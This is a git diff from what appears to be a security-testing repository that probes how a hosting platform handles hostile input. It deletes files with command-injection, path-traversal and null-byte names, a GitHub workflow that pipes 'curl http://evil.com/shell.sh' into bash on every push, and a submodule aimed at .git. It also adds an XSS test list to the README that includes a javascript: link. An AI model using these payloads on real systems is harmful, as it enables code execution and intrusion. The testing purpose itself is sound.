diff --git a/ .git/config b/ .git/config deleted file mode 100644 index a79069cae330c2e3976bde453834af214fc4d7b4..0000000000000000000000000000000000000000 --- a/ .git/config +++ /dev/null @@ -1 +0,0 @@ -test for leading space \ No newline at end of file diff --git a/$(id).txt b/$(id).txt deleted file mode 100644 index f3dda31eecd534113273686bb4312e888fef0696..0000000000000000000000000000000000000000 --- a/$(id).txt +++ /dev/null @@ -1 +0,0 @@ -inline:0:test \ No newline at end of file diff --git a/%252e%252e%252fetc%252fpasswd b/%252e%252e%252fetc%252fpasswd deleted file mode 100644 index f3dda31eecd534113273686bb4312e888fef0696..0000000000000000000000000000000000000000 --- a/%252e%252e%252fetc%252fpasswd +++ /dev/null @@ -1 +0,0 @@ -inline:0:test \ No newline at end of file diff --git a/%2e%2e/%2e%2e/etc/passwd b/%2e%2e/%2e%2e/etc/passwd deleted file mode 100644 index f3dda31eecd534113273686bb4312e888fef0696..0000000000000000000000000000000000000000 --- a/%2e%2e/%2e%2e/etc/passwd +++ /dev/null @@ -1 +0,0 @@ -inline:0:test \ No newline at end of file diff --git a/.env b/.env deleted file mode 100644 index 08cf6101416f0ce0dda3c80e627f333854c4085c..0000000000000000000000000000000000000000 --- a/.env +++ /dev/null @@ -1 +0,0 @@ -test content \ No newline at end of file diff --git "a/.git\tconfig" "b/.git\tconfig" deleted file mode 100644 index e757651bcc312e1003d154526c36c3784bb9f731..0000000000000000000000000000000000000000 --- "a/.git\tconfig" +++ /dev/null @@ -1 +0,0 @@ -test for tab in git path \ No newline at end of file diff --git "a/.git\vconfig" "b/.git\vconfig" deleted file mode 100644 index ee362de1ad1a22168739d84aa9a412d85fbf917f..0000000000000000000000000000000000000000 --- "a/.git\vconfig" +++ /dev/null @@ -1 +0,0 @@ -test for vtab in git path \ No newline at end of file diff --git a/.git%00/config b/.git%00/config deleted file mode 100644 index f7e2a7c7dd9787269550506e226334b6bee46ff2..0000000000000000000000000000000000000000 --- a/.git%00/config +++ /dev/null @@ -1 +0,0 @@ -test for pct-null in git path \ No newline at end of file diff --git a/.gitattributes b/.gitattributes index 580d310c2d211aca166288a207e972ced9bb0100..a6344aac8c09253b3b630fb776ae94478aa0275b 100644 --- a/.gitattributes +++ b/.gitattributes @@ -1 +1,35 @@ +*.7z filter=lfs diff=lfs merge=lfs -text +*.arrow filter=lfs diff=lfs merge=lfs -text +*.bin filter=lfs diff=lfs merge=lfs -text +*.bz2 filter=lfs diff=lfs merge=lfs -text +*.ckpt filter=lfs diff=lfs merge=lfs -text +*.ftz filter=lfs diff=lfs merge=lfs -text +*.gz filter=lfs diff=lfs merge=lfs -text +*.h5 filter=lfs diff=lfs merge=lfs -text +*.joblib filter=lfs diff=lfs merge=lfs -text +*.lfs.* filter=lfs diff=lfs merge=lfs -text +*.mlmodel filter=lfs diff=lfs merge=lfs -text +*.model filter=lfs diff=lfs merge=lfs -text +*.msgpack filter=lfs diff=lfs merge=lfs -text +*.npy filter=lfs diff=lfs merge=lfs -text +*.npz filter=lfs diff=lfs merge=lfs -text +*.onnx filter=lfs diff=lfs merge=lfs -text +*.ot filter=lfs diff=lfs merge=lfs -text +*.parquet filter=lfs diff=lfs merge=lfs -text +*.pb filter=lfs diff=lfs merge=lfs -text +*.pickle filter=lfs diff=lfs merge=lfs -text +*.pkl filter=lfs diff=lfs merge=lfs -text +*.pt filter=lfs diff=lfs merge=lfs -text +*.pth filter=lfs diff=lfs merge=lfs -text +*.rar filter=lfs diff=lfs merge=lfs -text *.safetensors filter=lfs diff=lfs merge=lfs -text +saved_model/**/* filter=lfs diff=lfs merge=lfs -text +*.tar.* filter=lfs diff=lfs merge=lfs -text +*.tar filter=lfs diff=lfs merge=lfs -text +*.tflite filter=lfs diff=lfs merge=lfs -text +*.tgz filter=lfs diff=lfs merge=lfs -text +*.wasm filter=lfs diff=lfs merge=lfs -text +*.xz filter=lfs diff=lfs merge=lfs -text +*.zip filter=lfs diff=lfs merge=lfs -text +*.zst filter=lfs diff=lfs merge=lfs -text +*tfevents* filter=lfs diff=lfs merge=lfs -text diff --git a/.github/workflows/evil.yml b/.github/workflows/evil.yml deleted file mode 100644 index 2110b14741e1f5612e164210e3b5d6c48c593faa..0000000000000000000000000000000000000000 --- a/.github/workflows/evil.yml +++ /dev/null @@ -1,7 +0,0 @@ -inline:0:name: evil -on: push -jobs: - evil: - runs-on: ubuntu-latest - steps: - - run: curl http://evil.com/shell.sh | bash \ No newline at end of file diff --git a/.gitmodules b/.gitmodules deleted file mode 100644 index e1885be605bec1236f9b14188c33c691372104dc..0000000000000000000000000000000000000000 --- a/.gitmodules +++ /dev/null @@ -1,3 +0,0 @@ -[submodule "evil"] - path = .git - url = https://example.com/evil.git diff --git a/.git~1/config b/.git~1/config deleted file mode 100644 index 2c0f2e33646e1bea218a84b0c13051dd0eb22539..0000000000000000000000000000000000000000 --- a/.git~1/config +++ /dev/null @@ -1 +0,0 @@ -shortname test \ No newline at end of file diff --git a/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.txt b/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.txt deleted file mode 100644 index f3dda31eecd534113273686bb4312e888fef0696..0000000000000000000000000000000000000000 --- a/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.txt +++ /dev/null @@ -1 +0,0 @@ -inline:0:test \ No newline at end of file diff --git a/README.md b/README.md index 80a0e9bfc1f03de6daf595b2b02ff91cd7ed1505..b6446eab02e88eb17f19ee962ebf5eb393dd2caf 100644 --- a/README.md +++ b/README.md @@ -1,5 +1,57 @@ --- license: mit --- -# test-hunt-2 -Test model for security research. +# XSS Round 2 + +## Test A: SVG animate + + +## Test B: SVG set + + +## Test C: SVG foreignObject + + +## Test D: SVG use external + + +## Test E: Style tag + + +## Test F: Base tag + + +## Test G: Object with SVG + + +## Test H: Anchor target +Click me + +## Test I: noscript + + +## Test J: CSS import + + +## Test K: MathJax/KaTeX +$$\href{javascript:alert(1)}{click}$$ + +## Test L: Tab/newline bypass + +test + +## Test M: HTML comment bypass + + +## Test N: Mutation XSS + + +## Test O: DOMPurify bypass attempts + +